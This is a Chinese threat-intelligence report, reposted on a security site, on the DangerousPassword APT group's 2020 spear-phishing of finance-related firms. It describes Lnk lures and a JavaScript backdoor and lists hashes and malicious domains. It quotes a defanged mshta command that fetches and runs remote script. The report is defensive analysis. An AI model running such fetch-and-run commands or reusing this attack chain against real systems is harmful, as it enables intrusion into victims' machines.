微慑信息网

“危险密码”APT组织 炎炎夏日再活跃

TAG:高级可持续攻击、危险密码、Lazarus、中国、NHT Global、UMKC、金融

TLP白(报告转发及使用不受限制)

日期:2020-08-24

概述
近日,微步情报局监测发现一批针对国内外企业金融交易相关业务的定向攻击活动,经过深度关联分析,该批次攻击事件的幕后组织为微步在线2019年11月披露的危险密码(DangerousPassword)APT组织。具体情况如下:
  • 本批次鱼叉式网络攻击事件中,投递载荷均为Lnk文件,在自释放(或通过谷歌在线文档下载)诱饵文档后,远程下载执行具有后门功能的javascript恶意代码。
  • 使用的诱饵文件包括中文类型的“奖金计划(2020年7月).docx”、“奖金计划(2020年8月).docx”以及“Project Management Plan.pdf”等。相关企业包括然健环球(中国)日用品有限公司(NHT Global)、美国密苏里大学堪萨斯分校(UMKC)。推测本次攻击时间段为2020年6月下旬至今。
  • 微步在线威胁检测平台(TDP)、威胁情报管理平台(TIP)、DNS防火墙(OneDNS)、威胁情报云API均已支持该团伙最新攻击的检测。如需协助,请与我们联系:[email protected]

详情
微步在线2019年首次披露危险密码APT组织时,攻击者投递的攻击载荷为加密的docx文件以及恶意的“Password.txt.lnk”文件两部分;在本次攻击事件中投递载荷形式稍有调整,由一个大体积的Lnk文件或涉及多步网络下载交互的Lnk文件直接实现攻击。攻击的目标行业基本维持一致,依然集中在金融交易相关的行业或业务部门。

托管于谷歌在线文档的诱饵文档内容如下所示。文档主题为然健环球(中国)日用品有限公司相关的奖金计划。

“危险密码”APT组织 炎炎夏日再活跃

用户PC端下载后展示如下:

“危险密码”APT组织 炎炎夏日再活跃

 

美国密苏里大学堪萨斯分校(UMKC)相关的诱饵文档如下。文档讲述了苏里大学堪萨斯分校师生使用Roo Bucks交易账户相关的Roo Balance应用程序设计框架。 
“危险密码”APT组织 炎炎夏日再活跃

样本分析

 
攻击者投递的原始攻击载荷为压缩文件,解压后为具备下载执行功能的Lnk文件。
“危险密码”APT组织 炎炎夏日再活跃

Lnk文件命令行执行C:WindowsSystem32mshta.exe https://bit[.]ly/3aCBejA,短域名中转后的真实域名为shop.newsbtctech[.]com。Lnk文件中可见嵌入的docx文件。

“危险密码”APT组织 炎炎夏日再活跃

远程执行的Jscript如下所示,通过谷歌在线文档获取诱饵文档内容,内嵌的payload资源经base64解码落地,然后带参执行。

“危险密码”APT组织 炎炎夏日再活跃

落地bpwez.js如下,传递参数为C&C地址,https://bit[.]ly/2NIurtU,短域名将跳转到真实C&C地址,newsbtctech.com。通过自定义随机函数生成用于标识中马PC的ID,将该ID发送至C&C服务器,然后进入后门执行的死循环代码,每15秒检查执行一次C&C服务器发送的payload。

“危险密码”APT组织 炎炎夏日再活跃

整体执行流程与历史披露的攻击事件中的流程基本一致。后续C&C服务器下发插件当前暂未捕获,可参考微步在线2019年11月发布的独家披露报告。

关联拓线

1. 样本维度关联

通过lnk文件结构中用于标识文件生成的机器平台MachineID进行拓线关联。

“危险密码”APT组织 炎炎夏日再活跃
关联样本如下:
样本名称 Hash 下载URL 真实域名
Project Management Plan.pdf.lnk 0d79b66f41858a336a385a7f6cc9e4e2fa06097b0ec422ce2d18bc6eabe5afee https://bit.ly/2Bsovmg drop.trailads.net
Project Management Plan.pdf.lnk d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805 https://bit.ly/3eIxLAZ drop.trailads.net
奖金计划(2020年8月).docx.lnk effd76c58906877364ad6c62ff7d8d711c83b78306e31350610a14b6610cdf1e https://bit.ly/3aCBejA shop.newsbtctech.com
Password.txt.lnk ca7e5275bf45970688d3b42424f5a130d59bef2f15993b95f6438eaa37a7801f https://bit.ly/2tsXyue share.onedrvfile.site
分析确认所关联样本均为危险密码组织攻击样本,但当前多数下载URL失效。

 

2. 网络资产拓线

通过newsbtctech.com C&C域名的历史DNS解析数据进行拓线关联。
“危险密码”APT组织 炎炎夏日再活跃
通过对关联域名whoise信息、pdns数据、关联样本等多维度关联比对,上述关联域名均为危险密码最新的网络资产。
微步在线全线产品当前已支持此次攻击事件的实时检测。

“危险密码”APT组织 炎炎夏日再活跃

“危险密码”APT组织 炎炎夏日再活跃

3. 同期,芬兰安全公司F-Secure对危险密码APT组织追踪发现,Javascript后门在后续会通过一段C&C下发的powershell下载最终的二进制木马,木马与卡巴斯基曾披露的Bluenoroff(Lazarus组织的一个分支)组织所使用的特马高度相似,由此可以推测,微步在线所披露的“危险密码”APT组织与Bluenoroff组织存在一定关联,结合其特定的攻击目标、攻击目的来看,危险密码”APT组织极有可能为Lazarus APT组织的一个分支机构。

原文始发于微信公众号(安全威胁情报):“危险密码”APT组织 炎炎夏日再活跃

本文标题:“危险密码”APT组织 炎炎夏日再活跃
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2020/0911_12562.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » “危险密码”APT组织 炎炎夏日再活跃
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们